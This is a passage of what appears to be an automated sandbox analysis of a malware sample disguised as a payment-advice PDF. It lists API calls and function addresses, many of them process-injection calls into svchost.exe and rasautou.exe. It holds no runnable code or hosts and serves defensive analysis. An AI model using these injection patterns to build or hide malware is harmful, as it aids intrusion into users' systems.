                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872CF0 NtOpenProcess,8_2_03872CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872C00 NtQueryInformationProcess,8_2_03872C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872C60 NtCreateKey,8_2_03872C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03873090 NtSetValueKey,8_2_03873090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03873010 NtOpenDirectoryObject,8_2_03873010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038739B0 NtGetContextThread,8_2_038739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03873D10 NtOpenProcessToken,8_2_03873D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03873D70 NtOpenThread,8_2_03873D70
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04994650 NtSuspendThread,LdrInitializeThunk,11_2_04994650
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04994340 NtSetContextThread,LdrInitializeThunk,11_2_04994340
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_04992CA0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_04992C70
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992C60 NtCreateKey,LdrInitializeThunk,11_2_04992C60
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992DD0 NtDelayExecution,LdrInitializeThunk,11_2_04992DD0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_04992DF0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992D10 NtMapViewOfSection,LdrInitializeThunk,11_2_04992D10
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_04992D30
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_04992E80
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992EE0 NtQueueApcThread,LdrInitializeThunk,11_2_04992EE0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992FB0 NtResumeThread,LdrInitializeThunk,11_2_04992FB0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992FE0 NtCreateFile,LdrInitializeThunk,11_2_04992FE0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992F30 NtCreateSection,LdrInitializeThunk,11_2_04992F30
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992AD0 NtReadFile,LdrInitializeThunk,11_2_04992AD0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992AF0 NtWriteFile,LdrInitializeThunk,11_2_04992AF0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_04992BA0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_04992BF0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992BE0 NtQueryValueKey,LdrInitializeThunk,11_2_04992BE0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992B60 NtClose,LdrInitializeThunk,11_2_04992B60
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049935C0 NtCreateMutant,LdrInitializeThunk,11_2_049935C0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049939B0 NtGetContextThread,LdrInitializeThunk,11_2_049939B0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992CC0 NtQueryVirtualMemory,11_2_04992CC0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992CF0 NtOpenProcess,11_2_04992CF0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992C00 NtQueryInformationProcess,11_2_04992C00
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992DB0 NtEnumerateKey,11_2_04992DB0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992D00 NtSetInformationFile,11_2_04992D00
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992EA0 NtAdjustPrivilegesToken,11_2_04992EA0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992E30 NtWriteVirtualMemory,11_2_04992E30
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992F90 NtProtectVirtualMemory,11_2_04992F90
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992FA0 NtQuerySection,11_2_04992FA0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992F60 NtCreateProcessEx,11_2_04992F60
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992AB0 NtWaitForSingleObject,11_2_04992AB0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04992B80 NtQueryInformationFile,11_2_04992B80
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04993090 NtSetValueKey,11_2_04993090
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04993010 NtOpenDirectoryObject,11_2_04993010
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04993D10 NtOpenProcessToken,11_2_04993D10
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04993D70 NtOpenThread,11_2_04993D70
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A69A60 NtDeleteFile,11_2_02A69A60
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A69B00 NtClose,11_2_02A69B00
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A69800 NtCreateFile,11_2_02A69800
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A69970 NtReadFile,11_2_02A69970
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A69C60 NtAllocateVirtualMemory,11_2_02A69C60
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008AA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_008AA1EF
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00898310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00898310
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008A51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_008A51BD
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0084E6A00_2_0084E6A0
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0086D9750_2_0086D975
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0084FCE00_2_0084FCE0
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008621C50_2_008621C5
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008762D20_2_008762D2
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008C03DA0_2_008C03DA
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0087242E0_2_0087242E
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008625FA0_2_008625FA
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008566E10_2_008566E1
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0089E6160_2_0089E616
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0087878F0_2_0087878F
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008A88890_2_008A8889
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008588080_2_00858808
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008768440_2_00876844
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008C08570_2_008C0857
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0086CB210_2_0086CB21
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00876DB60_2_00876DB6
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00856F9E0_2_00856F9E
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008530300_2_00853030
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008631870_2_00863187
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0086F1D90_2_0086F1D9
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008412870_2_00841287
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008614840_2_00861484
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008555200_2_00855520
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008676960_2_00867696
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008557600_2_00855760
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008619780_2_00861978
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00879AB50_2_00879AB5
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00861D900_2_00861D90
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0086BDA60_2_0086BDA6
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008C7DDB0_2_008C7DDB
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00853FE00_2_00853FE0
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_0084DF000_2_0084DF00
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_016565800_2_01656580
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00418C938_2_00418C93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004030608_2_00403060
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004010E08_2_004010E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004022C08_2_004022C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004022BA8_2_004022BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004013B08_2_004013B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0042F4238_2_0042F423
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004024288_2_00402428
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004024308_2_00402430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004104A38_2_004104A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004106C38_2_004106C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004026F68_2_004026F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00416E8F8_2_00416E8F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00416E938_2_00416E93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040E7438_2_0040E743
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004027008_2_00402700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384E3F08_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039003E68_2_039003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FA3528_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C02C08_2_038C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E02748_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F41A28_2_038F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039001AA8_2_039001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F81CC8_2_038F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038301008_2_03830100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DA1188_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C81588_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D20008_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383C7C08_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038647508_2_03864750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038407708_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385C6E08_2_0385C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039005918_2_03900591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038405358_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038EE4F68_2_038EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E44208_2_038E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F24468_2_038F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F6BD78_2_038F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FAB408_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383EA808_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038429A08_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0390A9A68_2_0390A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038569628_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038268B88_2_038268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0386E8F08_2_0386E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384A8408_2_0384A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038428408_2_03842840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038BEFA08_2_038BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03832FC88_2_03832FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384CFE08_2_0384CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03882F288_2_03882F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03860F308_2_03860F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E2F308_2_038E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B4F408_2_038B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03852E908_2_03852E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FCE938_2_038FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FEEDB8_2_038FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FEE268_2_038FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840E598_2_03840E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03858DBF8_2_03858DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383ADE08_2_0383ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384AD008_2_0384AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DCD1F8_2_038DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E0CB58_2_038E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03830CF28_2_03830CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03840C008_2_03840C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0388739A8_2_0388739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F132D8_2_038F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382D34C8_2_0382D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038452A08_2_038452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0385B2C08_2_0385B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038E12ED8_2_038E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0384B1B08_2_0384B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0387516C8_2_0387516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382F1728_2_0382F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0390B16B8_2_0390B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038EF0CC8_2_038EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038470C08_2_038470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F70E98_2_038F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FF0E08_2_038FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038FF7B08_2_038FF7B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038F16CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03885630
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038DD5B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_039095C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038F7571
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038FF43F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03831460
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0385FB80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B5BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0387DBF9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038FFB76
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038DDAAC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03885AA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038E1AA3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038EDAC6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038FFA49
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038F7A46
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B3A6C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038D5910
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03849950
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0385B950
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038438E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038AD800
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03841F92
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038FFFB1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038FFF09
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03849EB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0385FDC0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03843D40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038F1D5A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038F7D73
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038FFCF2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B9C32
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe | Code function: 10_2_04359D35
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe | Code function: 10_2_04360505
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe | Code function: 10_2_04360501
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe | Code function: 10_2_04357DB5
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe | Code function: 10_2_04378A95
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe | Code function: 10_2_04359B15
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe | Code function: 10_2_04362305
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A0E4F6
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A04420
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A12446
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A20591
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04960535
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0497C6E0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0495C7C0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04984750
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04960770
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049F2000
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A141A2
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A201AA
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A181CC
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049FA118
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04950100
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049E8158
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049E02C0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A00274
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A203E6
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0496E3F0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A1A352
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A00CB5
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04950CF2
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04960C00
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04978DBF
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0495ADE0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049FCD1F
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04972E90
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A1CE93
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A1EEDB
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A1EE26
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04960E59
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049DEFA0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04952FC8
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0496CFE0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A02F30
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04980F30
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049A2F28
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049D4F40
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049468B8
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0498E8F0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04962840
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0496A840
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A2A9A6
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049629A0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04976962
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0495EA80
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A16BD7
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A1AB40
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A1F43F
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04951460
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049FD5B0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A17571
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A116CC
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049A5630
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A1F7B0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A1F0E0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A170E9
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049670C0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A0F0CC
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0496B1B0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A2B16B
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0494F172
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0499516C
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049652A0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A012ED
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0497B2C0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049A739A
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A1132D
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0494D34C
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A1FCF2
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049D9C32
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0497FDC0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A17D73
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04963D40
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A11D5A
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04969EB0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04961F92
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A1FFB1
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04923FD2
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04923FD5
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A1FF09
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049638E0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049CD800
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049F5910
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04969950
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0497B950
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A01AA3
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049FDAAC
